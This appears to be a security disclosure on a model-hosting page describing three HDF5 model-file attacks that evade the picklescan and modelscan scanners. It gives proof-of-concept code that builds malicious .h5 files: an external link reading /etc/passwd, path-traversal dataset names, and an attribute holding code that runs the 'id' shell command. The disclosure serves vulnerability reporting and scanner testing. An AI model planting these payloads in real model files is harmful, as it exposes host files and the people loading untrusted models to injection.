HDF5: External Link File Read + Path Traversal + Attribute Injection

Summary

Three non-pickle attack classes against the HDF5 model file format (.h5, .hdf5) that bypass both picklescan 1.0.4 and modelscan 0.8.8 (3/3 MISSED by both):

External link → arbitrary file read — HDF5 ExternalLink objects reference files on the host filesystem. When accessed, h5py opens the linked file. A malicious model with ExternalLink("/etc/passwd", "/") reads host files.
Path traversal in dataset names — Dataset paths like ../../../tmp/evil are accepted and preserved in the HDF5 virtual filesystem. Tools that extract datasets to disk write outside the target directory.
Code injection in attributes — Attribute names and values accept arbitrary strings including Python code and path traversal characters. Downstream tools that eval attributes or use attribute names as paths are vulnerable.

Format: HDF5 ($1,500 MFV) Scanners tested: picklescan 1.0.4 + modelscan 0.8.8 — 3/3 MISSED by both

Payloads

File	Attack	Impact	picklescan	modelscan
`hdf5_external_link.h5`	`ExternalLink("/etc/passwd", "/")`	Arbitrary file read when link is accessed	MISSED	MISSED
`hdf5_traversal.h5`	Dataset path `../../../tmp/pwned`	File write on dataset extraction	MISSED	MISSED
`hdf5_attr_injection.h5`	Code in attribute value + traversal in attribute name	Injection if attrs are evaluated or used as paths	MISSED	MISSED

Vulnerability Details

External Link → File Read (CWE-22)

HDF5 supports external links that reference other files. When a dataset accessed via an external link is read, h5py opens the referenced file from the host filesystem:

import h5py, numpy as np

# Create malicious model
with h5py.File("evil_model.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret_data"] = h5py.ExternalLink("/etc/passwd", "/")

# Victim loads model and iterates datasets:
with h5py.File("evil_model.h5", 'r') as f:
    for key in f.keys():
        data = f[key]  # accessing "secret_data" opens /etc/passwd

In ML pipelines, models are loaded from untrusted sources (Hugging Face Hub, shared storage). The external link is embedded in the HDF5 file itself — no user interaction beyond loading.

Path Traversal in Dataset Names (CWE-22)

HDF5's virtual filesystem accepts path traversal in group/dataset names:

with h5py.File("model.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0]))

The .. component navigates up in the HDF5 group hierarchy. While h5py resolves this internally, tools that map HDF5 paths to filesystem paths during extraction are vulnerable.

Attribute Injection (CWE-94)

Attribute names and values are unrestricted:

with h5py.File("model.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

Verified: both attribute names with path traversal and values with Python code are preserved verbatim. Tools that:

Use attribute names as file paths (export tools)
Render attribute values in web UIs (model registries)
Pass attribute values to template engines or eval()

are vulnerable to injection.

Proof of Concept

import h5py, numpy as np

# Payload 1: External link
with h5py.File("hdf5_external_link.h5", 'w') as f:
    f.create_dataset("weights", data=np.random.randn(10, 10))
    f["secret"] = h5py.ExternalLink("/etc/passwd", "/")

# Payload 2: Path traversal
with h5py.File("hdf5_traversal.h5", 'w') as f:
    f.create_dataset("../../../tmp/pwned", data=np.array([1.0, 2.0]))
    f.create_dataset("normal_weights", data=np.random.randn(10, 10))

# Payload 3: Attribute injection
with h5py.File("hdf5_attr_injection.h5", 'w') as f:
    ds = f.create_dataset("weights", data=np.random.randn(10, 10))
    ds.attrs["../../../tmp/evil"] = "traversal in attr name"
    ds.attrs["description"] = '__import__("os").system("id")'

References

Downloads last month: -; Downloads are not tracked for this model. How to track

Inference Providers NEW

This model isn't deployed by any Inference Provider. 🙋 Ask for provider support